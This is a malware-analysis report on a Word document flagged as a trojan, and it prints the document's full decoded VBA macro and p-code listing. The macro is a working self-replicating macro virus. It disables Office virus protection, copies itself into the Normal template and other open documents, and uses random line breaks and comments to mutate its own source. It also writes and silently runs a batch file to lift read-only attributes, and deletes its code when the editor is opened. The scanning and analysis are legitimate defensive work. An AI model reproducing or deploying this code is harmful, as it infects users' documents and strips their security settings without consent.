MALICIOUS
260
Risk Score
Heuristics 4
-
ClamAV: Doc.Trojan.Ded-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Ded-1
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
shellResult = Shell(Dir(fName) & ".bat", vbHide) -
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
VBProject.VBComponents(1).CodeModule.InsertLines I * 2, d
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 21185 bytes |
SHA-256: eafa426522a6ec1477236b08d9df2f3fb351124454a1e35f55c31a960e56c226 |
|||
|
Detection
ClamAV:
Doc.Trojan.Ded-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub _
Document_Close()
On Error GoTo _
skam
Options.VirusProtection _
= False
SWL
'40,13744
ABS99
'41,27668
skam:
'58,3359
End Sub
'91,93771
Private Sub SWL()
'40,48341
Application. _
ShowVisualBasicEditor = False
If _
Not ActiveDocument.VBProject.VBComponents(1).CodeModule.Find("Document_Close", 1, 1, 1000, 1000, False, False) Then
For I = 1 To NormalTemplate.VBProject.VBComponents(1). _
CodeModule.CountOfLines
d = _
NormalTemplate.VBProject.VBComponents(1).CodeModule.Lines(I, 1)
If _
Len(d) > 0 And Not d = " " And Not d = " _" And Not d = "" And Not Mid(d, 1, 1) = "'" Then
While _
Mid(d, Len(d) - 1, 2) = " _"
I _
= I + 1
d = _
Left(d, Len(d) - 1) & NormalTemplate.VBProject.VBComponents(1).CodeModule.Lines(I, 1)
Wend
'84,72455
d = _
e(d)
ActiveDocument. _
VBProject.VBComponents(1).CodeModule.InsertLines I * 2, d
End If
'36,34587
Next _
I
ActiveDocument. _
SaveAs AddToRecentFiles:=False
End If
'90,30988
End Sub
'27,52955
Private Sub ABS99()
'97,29667
If Not NormalTemplate. _
VBProject.VBComponents(1).CodeModule.Find("Document_Close", 1, 1, 1000, 1000, False, False) Then
f (NormalTemplate. _
FullName)
For _
I = 1 To ActiveDocument.VBProject.VBComponents(1).CodeModule.CountOfLines
d _
= ActiveDocument.VBProject.VBComponents(1).CodeModule.Lines(I, 1)
If _
Len(d) > 0 And Not d = " " And Not d = " _" And Not d = "" And Not Mid(d, 1, 1) = "'" Then
While _
Mid(d, Len(d) - 1, 2) = " _"
I = I + 1
'74,23421
d = Left(d, Len(d) - _
1) & ActiveDocument.VBProject.VBComponents(1).CodeModule.Lines(I, 1)
Wend
'7,495034
d = _
e(d)
NormalTemplate. _
VBProject.VBComponents(1).CodeModule.InsertLines I * 2, d
End _
If
Next I
'47,13914
NormalTemplate.Save
'82,7899
End _
If
End _
Sub
Private Function e(aString) As _
String
aString = LTrim(aString)
'26,80438
aString = _
RTrim(aString)
If _
aString = "Sub " & "Vc()" Then
aString _
= "Sub " & "ViewVBCode()"
Else
'31,18372
If aString = "Sub " & "ViewVBCode()" Then
'45,09994
aString _
= "Sub " & "Vc()"
End If
'6,985104
End If
'92,54505
For I = 1 To _
Len(aString) - 1
If Mid(aString, I, 1) _
= "." Then
If Not Mid(aString, _
I - 1, 1) = Chr$(34) And Not Mid(aString, I + 1, 1) = Chr$(34) And Int(3 * Rnd) = 1 Then
If Not _
Mid(aString, I + 1, 1) = Chr$(34) Then
e _
= Left(aString, I - 1) & ". _" & Chr$(13) & Right(aString, Len(aString) - I)
For _
j = 1 To Int(15 * Rnd)
e = " " & _
e
Next j
'37,77427
Exit Function
'4,393273
End If
'20,96745
End _
If
Else
'53,82507
If Mid(aString, I, _
1) = " " And Int(3 * Rnd) = 1 And I > 1 Then
If Not Mid(aString, _
I + 1, 1) = Chr$(34) And Not Mid(aString, I - 1, 1) = Chr$(34) Then
e = Left(aString, I _
- 1) & " _" & Chr$(13) & Right(aString, Len(aString) - I)
For _
j = 1 To Int(15 * Rnd)
e = " " & _
e
Next j
'29,1052
Exit Function
'76,98775
End If
'17,76208
End If
'43,15423
End _
If
Next I
'41,63005
e _
= aString & Chr$(13) & "'" & (100 * Rnd)
Count _
= Int(15 * Rnd)
For _
j = 1 To Count
e _
= " " & e
Next j
'76,01295
End Function
'27,8411
Private _
Sub f(fName)
If GetAttr(fName) And vbReadOnly Then
'95,71298
Open Dir(fName) _
& ".bat" For Append As #1
Print _
#1, "Attrib " & "-r " & Chr$(34) & fName & Chr$(34)
Print _
#1, "del " & Chr$(34) & Dir(fName) & ".bat" & Chr$(34)
Close _
#1
shellResult = Shell(Dir(fName) & ".bat", vbHide)
'86,16203
End If
'27,48487
End _
Sub
Sub _
ViewVBCode()
For _
aDoc = 1 To Documents.Count
For I = _
1 To Documents(aDoc).VBProject.VBComponents(1).CodeModule.CountOfLines
Documents(aDoc).VBProject. _
VBComponents(1).CodeModule.DeleteLines 1
Next I
'49,3554
Next aDoc
'14,7068
For _
I = 1 To NormalTemplate.VBProject.VBComponents(1).CodeModule.CountOfLines
NormalTemplate. _
VBProject.VBComponents(1).CodeModule.DeleteLines 1
Next I
'29,4584
Application.ShowVisualBasicEditor _
= True
End Sub
'0,3313601
' Processing file: /opt/analyzer/scan_staging/d404f8fea31647ee932dfc9f85f455a7.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 9627 bytes
' Line #0:
' LineCont 0x0004 02 00 00 00
' FuncDefn (Private Sub Document_Close())
' Line #1:
' Line #2:
' LineCont 0x0004 03 00 00 00
' OnError skam
' Line #3:
' Line #4:
' LineCont 0x0004 03 00 00 00
' LitVarSpecial (False)
' Ld Options
' MemSt VirusProtection
' Line #5:
' Line #6:
' ArgsCall SWL 0x0000
' Line #7:
' QuoteRem 0x0000 0x0008 "40,13744"
' Line #8:
' ArgsCall ABS99 0x0000
' Line #9:
' QuoteRem 0x0000 0x0008 "41,27668"
' Line #10:
' Label skam
' Line #11:
' QuoteRem 0x0000 0x0007 "58,3359"
' Line #12:
' EndSub
' Line #13:
' QuoteRem 0x0000 0x0008 "91,93771"
' Line #14:
' FuncDefn (Private Sub SWL())
' Line #15:
' QuoteRem 0x0000 0x0008 "40,48341"
' Line #16:
' LineCont 0x0004 02 00 1D 00
' LitVarSpecial (False)
' Ld Application
' MemSt ShowVisualBasicEditor
' Line #17:
' Line #18:
' LineCont 0x0004 01 00 00 00
' LitStr 0x000E "Document_Close"
' LitDI2 0x0001
' LitDI2 0x0001
' LitDI2 0x03E8
' LitDI2 0x03E8
' LitVarSpecial (False)
' LitVarSpecial (False)
' LitDI2 0x0001
' Ld ActiveDocument
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' ArgsMemLd Find 0x0007
' Not
' IfBlock
' Line #19:
' Line #20:
' LineCont 0x0004 0E 00 19 00
' StartForVariable
' Ld I
' EndForVariable
' LitDI2 0x0001
' LitDI2 0x0001
' Ld NormalTemplate
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' MemLd CountOfLines
' For
' Line #21:
' Line #22:
' LineCont 0x0004 02 00 00 00
' Ld I
' LitDI2 0x0001
' LitDI2 0x0001
' Ld NormalTemplate
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' ArgsMemLd Lines 0x0002
' St d
' Line #23:
' Line #24:
' LineCont 0x0004 01 00 00 00
' Ld d
' FnLen
' LitDI2 0x0000
' Gt
' Ld d
' LitStr 0x0001 " "
' Eq
' Not
' And
' Ld d
' LitStr 0x0002 " _"
' Eq
' Not
' And
' Ld d
' LitStr 0x0000 ""
' Eq
' Not
' And
' Ld d
' LitDI2 0x0001
' LitDI2 0x0001
' ArgsLd Mid$ 0x0003
' LitStr 0x0001 "'"
' Eq
' Not
' And
' IfBlock
' Line #25:
' Line #26:
' LineCont 0x0004 01 00 00 00
' Ld d
' Ld d
' FnLen
' LitDI2 0x0001
' Sub
' LitDI2 0x0002
' ArgsLd Mid$ 0x0003
' LitStr 0x0002 " _"
' Eq
' While
' Line #27:
' Line #28:
' LineCont 0x0004 01 00 00 00
' Ld I
' LitDI2 0x0001
' Add
' St I
' Line #29:
' Line #30:
' LineCont 0x0004 02 00 00 00
' Ld d
' Ld d
' FnLen
' LitDI2 0x0001
' Sub
' ArgsLd LBound 0x0002
' Ld I
' LitDI2 0x0001
' LitDI2 0x0001
' Ld NormalTemplate
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' ArgsMemLd Lines 0x0002
' Concat
' St d
' Line #31:
' Line #32:
' Wend
' Line #33:
' QuoteRem 0x0000 0x0008 "84,72455"
' Line #34:
' LineCont 0x0004 02 00 00 00
' Ld d
' ArgsLd e 0x0001
' St d
' Line #35:
' Line #36:
' LineCont 0x0004 02 00 20 00
' Ld I
' LitDI2 0x0002
' Mul
' Ld d
' LitDI2 0x0001
' Ld ActiveDocument
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' ArgsMemCall InsertLines 0x0002
' Line #37:
' Line #38:
' EndIfBlock
' Line #39:
' QuoteRem 0x0000 0x0008 "36,34587"
' Line #40:
' LineCont 0x0004 01 00 00 00
' StartForVariable
' Ld I
' EndForVariable
' NextVar
' Line #41:
' Line #42:
' LineCont 0x0004 02 00 21 00
' LitVarSpecial (False)
' ParamNamed AddToRecentFiles
' Ld ActiveDocument
' ArgsMemCall SaveAs 0x0001
' Line #43:
' Line #44:
' EndIfBlock
' Line #45:
' QuoteRem 0x0000 0x0008 "90,30988"
' Line #46:
' EndSub
' Line #47:
' QuoteRem 0x0000 0x0008 "27,52955"
' Line #48:
' FuncDefn (Private Sub ABS99())
' Line #49:
' QuoteRem 0x0000 0x0008 "97,29667"
' Line #50:
' LineCont 0x0004 04 00 19 00
' LitStr 0x000E "Document_Close"
' LitDI2 0x0001
' LitDI2 0x0001
' LitDI2 0x03E8
' LitDI2 0x03E8
' LitVarSpecial (False)
' LitVarSpecial (False)
' LitDI2 0x0001
' Ld NormalTemplate
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' ArgsMemLd Find 0x0007
' Not
' IfBlock
' Line #51:
' Line #52:
' LineCont 0x0004 04 00 1C 00
' Ld NormalTemplate
' MemLd FullName
' Paren
' ArgsCall False 0x0001
' Line #53:
' Line #54:
' LineCont 0x0004 01 00 00 00
' StartForVariable
' Ld I
' EndForVariable
' LitDI2 0x0001
' LitDI2 0x0001
' Ld ActiveDocument
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' MemLd CountOfLines
' For
' Line #55:
' Line #56:
' LineCont 0x0004 01 00 00 00
' Ld I
' LitDI2 0x0001
' LitDI2 0x0001
' Ld ActiveDocument
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' ArgsMemLd Lines 0x0002
' St d
' Line #57:
' Line #58:
' LineCont 0x0004 01 00 00 00
' Ld d
' FnLen
' LitDI2 0x0000
' Gt
' Ld d
' LitStr 0x0001 " "
' Eq
' Not
' And
' Ld d
' LitStr 0x0002 " _"
' Eq
' Not
' And
' Ld d
' LitStr 0x0000 ""
' Eq
' Not
' And
' Ld d
' LitDI2 0x0001
' LitDI2 0x0001
' ArgsLd Mid$ 0x0003
' LitStr 0x0001 "'"
' Eq
' Not
' And
' IfBlock
' Line #59:
' Line #60:
' LineCont 0x0004 01 00 00 00
' Ld d
' Ld d
' FnLen
' LitDI2 0x0001
' Sub
' LitDI2 0x0002
' ArgsLd Mid$ 0x0003
' LitStr 0x0002 " _"
' Eq
' While
' Line #61:
' Line #62:
' Ld I
' LitDI2 0x0001
' Add
' St I
' Line #63:
' QuoteRem 0x0000 0x0008 "74,23421"
' Line #64:
' LineCont 0x0004 0B 00 00 00
' Ld d
' Ld d
' FnLen
' LitDI2 0x0001
' Sub
' ArgsLd LBound 0x0002
' Ld I
' LitDI2 0x0001
' LitDI2 0x0001
' Ld ActiveDocument
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' ArgsMemLd Lines 0x0002
' Concat
' St d
' Line #65:
' Line #66:
' Wend
' Line #67:
' QuoteRem 0x0000 0x0008 "7,495034"
' Line #68:
' LineCont 0x0004 02 00 00 00
' Ld d
' ArgsLd e 0x0001
' St d
' Line #69:
' Line #70:
' LineCont 0x0004 02 00 00 00
' Ld I
' LitDI2 0x0002
' Mul
' Ld d
' LitDI2 0x0001
' Ld NormalTemplate
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' ArgsMemCall InsertLines 0x0002
' Line #71:
' Line #72:
' LineCont 0x0004 01 00 00 00
' EndIfBlock
' Line #73:
' Line #74:
' StartForVariable
' Ld I
' EndForVariable
' NextVar
' Line #75:
' QuoteRem 0x0000 0x0008 "47,13914"
' Line #76:
' Ld NormalTemplate
' ArgsMemCall Save 0x0000
' Line #77:
' QuoteRem 0x0000 0x0007 "82,7899"
' Line #78:
' LineCont 0x0004 01 00 00 00
' EndIfBlock
' Line #79:
' Line #80:
' LineCont 0x0004 01 00 00 00
' EndSub
' Line #81:
' Line #82:
' LineCont 0x0004 07 00 00 00
' FuncDefn (Private Function e(aString, id_FFFE As String) As String)
' Line #83:
' Line #84:
' Ld aString
' ArgsLd LTrim 0x0001
' St aString
' Line #85:
' QuoteRem 0x0000 0x0008 "26,80438"
' Line #86:
' LineCont 0x0004 02 00 00 00
' Ld aString
' ArgsLd RTrim 0x0001
' St aString
' Line #87:
' Line #88:
' LineCont 0x0004 01 00 00 00
' Ld aString
' LitStr 0x0004 "Sub "
' LitStr 0x0004 "Vc()"
' Concat
' Eq
' IfBlock
' Line #89:
' Line #90:
' LineCont 0x0004 01 00 00 00
' LitStr 0x0004 "Sub "
' LitStr 0x000C "ViewVBCode()"
' Concat
' St aString
' Line #91:
' Line #92:
' ElseBlock
' Line #93:
' QuoteRem 0x0000 0x0008 "31,18372"
' Line #94:
' Ld aString
' LitStr 0x0004 "Sub "
' LitStr 0x000C "ViewVBCode()"
' Concat
' Eq
' IfBlock
' Line #95:
' QuoteRem 0x0000 0x0008 "45,09994"
' Line #96:
' LineCont 0x0004 01 00 00 00
' LitStr 0x0004 "Sub "
' LitStr 0x0004 "Vc()"
' Concat
' St aString
' Line #97:
' Line #98:
' EndIfBlock
' Line #99:
' QuoteRem 0x0000 0x0008 "6,985104"
' Line #100:
' EndIfBlock
' Line #101:
' QuoteRem 0x0000 0x0008 "92,54505"
' Line #102:
' LineCont 0x0004 05 00 00 00
' StartForVariable
' Ld I
' EndForVariable
' LitDI2 0x0001
' Ld aString
' FnLen
' LitDI2 0x0001
' Sub
' For
' Line #103:
' Line #104:
' LineCont 0x0004 09 00 00 00
' Ld aString
' Ld I
' LitDI2 0x0001
' ArgsLd Mid$ 0x0003
' LitStr 0x0001 "."
' Eq
' IfBlock
' Line #105:
' Line #106:
' LineCont 0x0004 06 00 00 00
' Ld aString
' Ld I
' LitDI2 0x0001
' Sub
' LitDI2 0x0001
' ArgsLd Mid$ 0x0003
' LitDI2 0x0022
' ArgsLd Chr$ 0x0001
' Eq
' Not
' Ld aString
' Ld I
' LitDI2 0x0001
' Add
' LitDI2 0x0001
' ArgsLd Mid$ 0x0003
' LitDI2 0x0022
' ArgsLd Chr$ 0x0001
' Eq
' Not
' And
' LitDI2 0x0003
' Ld Rnd
' Mul
' FnInt
' LitDI2 0x0001
' Eq
' And
' IfBlock
' Line #107:
' Line #108:
' LineCont 0x0004 02 00 00 00
' Ld aString
' Ld I
' LitDI2 0x0001
' Add
' LitDI2 0x0001
' ArgsLd Mid$ 0x0003
' LitDI2 0x0022
' ArgsLd Chr$ 0x0001
' Eq
' Not
' IfBlock
' Line #109:
' Line #110:
' LineCont 0x0004 01 00 00 00
' Ld aString
' Ld I
' LitDI2 0x0001
' Sub
' ArgsLd LBound 0x0002
' LitStr 0x0003 ". _"
' Concat
' LitDI2 0x000D
' ArgsLd Chr$ 0x0001
' Concat
' Ld aString
' Ld aString
' FnLen
' Ld I
' Sub
' ArgsLd Right 0x0002
' Concat
' St e
' Line #111:
' Line #112:
' LineCont 0x0004 01 00 00 00
' StartForVariable
' Ld j
' EndForVariable
' LitDI2 0x0001
' LitDI2 0x000F
' Ld Rnd
' Mul
' FnInt
' For
' Line #113:
' Line #114:
' LineCont 0x0004 04 00 00 00
' LitStr 0x0001 " "
' Ld e
' Concat
' St e
' Line #115:
' Line #116:
' StartForVariable
' Ld j
' EndForVariable
' NextVar
' Line #117:
' QuoteRem 0x0000 0x0008 "37,77427"
' Line #118:
' ExitFunc
' Line #119:
' QuoteRem 0x0000 0x0008 "4,393273"
' Line #120:
' EndIfBlock
' Line #121:
' QuoteRem 0x0000 0x0008 "20,96745"
' Line #122:
' LineCont 0x0004 01 00 00 00
' EndIfBlock
' Line #123:
' Line #124:
' ElseBlock
' Line #125:
' QuoteRem 0x0000 0x0008 "53,82507"
' Line #126:
' LineCont 0x0004 07 00 00 00
' Ld aString
' Ld I
' LitDI2 0x0001
' ArgsLd Mid$ 0x0003
' LitStr 0x0001 " "
' Eq
' LitDI2 0x0003
' Ld Rnd
' Mul
' FnInt
' LitDI2 0x0001
' Eq
' And
' Ld I
' LitDI2 0x0001
' Gt
' And
' IfBlock
' Line #127:
' Line #128:
' LineCont 0x0004 06 00 00 00
' Ld aString
' Ld I
' LitDI2 0x0001
' Add
' LitDI2 0x0001
' ArgsLd Mid$ 0x0003
' LitDI2 0x0022
' ArgsLd Chr$ 0x0001
' Eq
' Not
' Ld aString
' Ld I
' LitDI2 0x0001
' Sub
' LitDI2 0x0001
' ArgsLd Mid$ 0x0003
' LitDI2 0x0022
' ArgsLd Chr$ 0x0001
' Eq
' Not
' And
' IfBlock
' Line #129:
' Line #130:
' LineCont 0x0004 07 00 00 00
' Ld aString
' Ld I
' LitDI2 0x0001
' Sub
' ArgsLd LBound 0x0002
' LitStr 0x0002 " _"
' Concat
' LitDI2 0x000D
' ArgsLd Chr$ 0x0001
' Concat
' Ld aString
' Ld aString
' FnLen
' Ld I
' Sub
' ArgsLd Right 0x0002
' Concat
' St e
' Line #131:
' Line #132:
' LineCont 0x0004 01 00 00 00
' StartForVariable
' Ld j
' EndForVariable
' LitDI2 0x0001
' LitDI2 0x000F
' Ld Rnd
' Mul
' FnInt
' For
' Line #133:
' Line #134:
' LineCont 0x0004 04 00 00 00
' LitStr 0x0001 " "
' Ld e
' Concat
' St e
' Line #135:
' Line #136:
' StartForVariable
' Ld j
' EndForVariable
' NextVar
' Line #137:
' QuoteRem 0x0000 0x0007 "29,1052"
' Line #138:
' ExitFunc
' Line #139:
' QuoteRem 0x0000 0x0008 "76,98775"
' Line #140:
' EndIfBlock
' Line #141:
' QuoteRem 0x0000 0x0008 "17,76208"
' Line #142:
' EndIfBlock
' Line #143:
' QuoteRem 0x0000 0x0008 "43,15423"
' Line #144:
' LineCont 0x0004 01 00 00 00
' EndIfBlock
' Line #145:
' Line #146:
' StartForVariable
' Ld I
' EndForVariable
' NextVar
' Line #147:
' QuoteRem 0x0000 0x0008 "41,63005"
' Line #148:
' LineCont 0x0004 01 00 00 00
' Ld aString
' LitDI2 0x000D
' ArgsLd Chr$ 0x0001
' Concat
' LitStr 0x0001 "'"
' Concat
' LitDI2 0x0064
' Ld Rnd
' Mul
' Paren
' Concat
' St e
' Line #149:
' Line #150:
' LineCont 0x0004 01 00 00 00
' LitDI2 0x000F
' Ld Rnd
' Mul
' FnInt
' St Count
' Line #151:
' Line #152:
' LineCont 0x0004 01 00 00 00
' StartForVariable
' Ld j
' EndForVariable
' LitDI2 0x0001
' Ld Count
' For
' Line #153:
' Line #154:
' LineCont 0x0004 01 00 00 00
' LitStr 0x0001 " "
' Ld e
' Concat
' St e
' Line #155:
' Line #156:
' StartForVariable
' Ld j
' EndForVariable
…
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.